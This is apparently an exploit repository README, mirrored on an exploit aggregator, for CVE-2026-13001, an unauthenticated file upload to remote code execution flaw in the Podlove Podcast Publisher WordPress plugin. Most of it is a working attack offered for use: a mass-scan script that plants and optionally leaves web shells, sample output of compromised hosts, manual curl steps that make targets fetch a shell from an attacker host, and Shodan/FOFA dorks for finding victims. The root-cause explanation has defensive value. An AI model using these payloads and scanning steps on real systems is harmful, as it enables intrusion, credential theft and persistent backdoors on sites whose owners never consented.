Share
## https://sploitus.com/exploit?id=7EB20766-CE15-52F8-8606-681C9D45AAAF
CVE-2026-13001 โ€” Podlove Podcast Publisher Unauthenticated File Upload RCE
is_image() vs extract_file_extension() Mismatch โ†’ PHP Polyglot Upload

---

## Overview

**CVE-2026-13001** is a critical-severity (CVSS 9.8) **unauthenticated** arbitrary file upload vulnerability in the **Podlove Podcast Publisher** WordPress plugin versions **โ‰ค 4.5.1**.

The vulnerability exploits a mismatch between two internal functions that parse file extensions differently:

- **`is_image()`** uses `basename()` which **includes query strings** โ†’ URL `shell.php?.gif` appears as `.gif` โœ… (valid image)
- **`extract_file_extension()`** uses `parse_url()` path only โ†’ returns `.php` โ†’ file saved with `.php` extension ๐Ÿšจ

Attackers upload **GIF89a PHP polyglots** (valid GIF header + embedded PHP) that pass image validation but execute as PHP when accessed.

### Affected Versions

| Version | Status |
|---|---|
| โ‰ค 4.5.1 | Vulnerable |
| 4.5.2+ | Patched |

> **Discovered by:** Talal Nasraddeen via Wordfence (July 14, 2026)

---

## Vulnerability Mechanism

### Root Cause

```php
// is_image() โ€” uses basename() which includes query string
function is_image($url) {
    $ext = strtolower(pathinfo(basename($url), PATHINFO_EXTENSION));
    return in_array($ext, ['jpg','jpeg','png','gif','webp']);
}
// URL: https://attacker.com/shell.php?.gif
// basename() โ†’ "shell.php?.gif" โ†’ ext = "gif" โœ… BYPASSED
```

```php
// extract_file_extension() โ€” uses parse_url() path only
function extract_file_extension($url) {
    $path = parse_url($url, PHP_URL_PATH);
    return pathinfo($path, PATHINFO_EXTENSION);
}
// URL: https://attacker.com/shell.php?.gif
// parse_url() โ†’ "/shell.php" โ†’ ext = "php" ๐Ÿšจ SAVED AS .php
```

### Attack Flow

```
1. Attacker hosts GIF89a PHP polyglot at attacker.com/shell.php?.gif
2. GET /?podlove_image_cache_url={hex(url)}&podlove_file_name=test
3. is_image() validates .gif extension โ†’ PASS
4. Plugin downloads file โ†’ saves as test_original.php in cache/
5. Attacker accesses /wp-content/cache/podlove/{hash}/test_original.php
6. PHP executes โ†’ RCE
```

---

## Installation

```bash
git clone https://github.com/shinthink/CVE-2026-13001.git
cd CVE-2026-13001
pip install -r requirements.txt
```

---

## Usage

```bash
# Single target
python cve_2026_13001.py -t target.com

# Mass scan
python cve_2026_13001.py -f targets.txt -o shells.txt

# Custom payload URL
python cve_2026_13001.py -t target.com --payload-url https://yourserver/shell.php?.gif

# Debug mode, leave shells
python cve_2026_13001.py -t target.com --debug --no-cleanup
```

### Arguments

```
  -t, --target       Single target (domain or IP)
  -f, --file         Target list, one per line
  -o, --output       Save RCE URLs to file
  --payload-url      URL hosting the PHP polyglot (default: GitHub raw)
  --threads          Concurrent workers (default: 30)
  --no-cleanup       Leave shells on target
  --debug            Show every HTTP request
  -v, --verbose      Verbose output
```

---

## Proof of Concept

### Single Target

```bash
$ python cve_2026_13001.py -t podcast-site.com
```

```
  Podlove Podcast Publisher | CVE-2026-13001 | CVSS 9.8

  Host       : podcast-site.com
  Podlove    : YES v4.5.1
  Upload     : YES
  RCE        : YES
  Shell      : https://podcast-site.com/wp-content/cache/podlove/a1/b2.../think_xxx_original.php?t=TOKEN
  Output     : uid=33(www-data) gid=33(www-data)
  Time       : 4.2s
```

### Mass Scan

```
  Targets: 500  |  Threads: 30
  Payload URL: https://raw.githubusercontent.com/shinthink/payloads/main/shell.gif

  [RCE] podcast-vuln-01.com       https://podcast-vuln-01.com/wp-content/cache/podlove/...
  [150/500] 30% | Det:42 RCE:8
```

### Manual Exploitation

**Step 1 โ€” Host a polyglot shell**
```php
// shell.php โ€” save and host on your server
GIF89a
```

**Step 2 โ€” Hex-encode the URL with bypass**
```bash
# URL: https://attacker.com/shell.php?.gif
echo -n "https://attacker.com/shell.php?.gif" | xxd -p | tr -d '\n'
```

**Step 3 โ€” Trigger the cache download**
```bash
curl 'https://target.com/?podlove_image_cache_url=68747470733a2f2f...&podlove_file_name=shell&podlove_width=100&podlove_height=100&podlove_crop=0'
```

**Step 4 โ€” Access the shell**
```bash
# Path: wp-content/cache/podlove/{h[:2]}/{h[2:]}/{name}_original.php
curl 'https://target.com/wp-content/cache/podlove/a1/b2c3.../shell_original.php?c=id'
```

---

## FOFA / Shodan

```
FOFA:   body="podlove-podcasting-plugin-for-wordpress"
Shodan: http.html:"podlove"
```

---

## Impact

Successful exploitation yields **remote code execution as the web server user**:
- Extract `wp-config.php` โ†’ database credentials
- Access all WordPress content, users, and plugin data
- Deploy persistent backdoors
- Pivot to internal networks

---

## Disclaimer

> **FOR EDUCATIONAL AND AUTHORIZED TESTING PURPOSES ONLY.**
>
> The authors assume no liability for misuse.

---

## References

| Resource | Link |
|---|---|
| Wordfence Advisory | [wordfence.com](https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/podlove-podcasting-plugin-for-wordpress/podlove-podcast-publisher-451-unauthenticated-arbitrary-file-upload-via-podlove-image-cache-url-parameter) |
| Podlove Security Release | [podlove.org](https://podlove.org/blog/security-release-cve-2026-13001/) |
| NVD Entry | [CVE-2026-13001](https://nvd.nist.gov/vuln/detail/CVE-2026-13001) |
| PoC by Raimu0x19 | [GitHub](https://github.com/Raimu0x19/CVE-2026-13001) |
| Researcher | Talal Nasraddeen |

---


  Not affiliated with Podlove.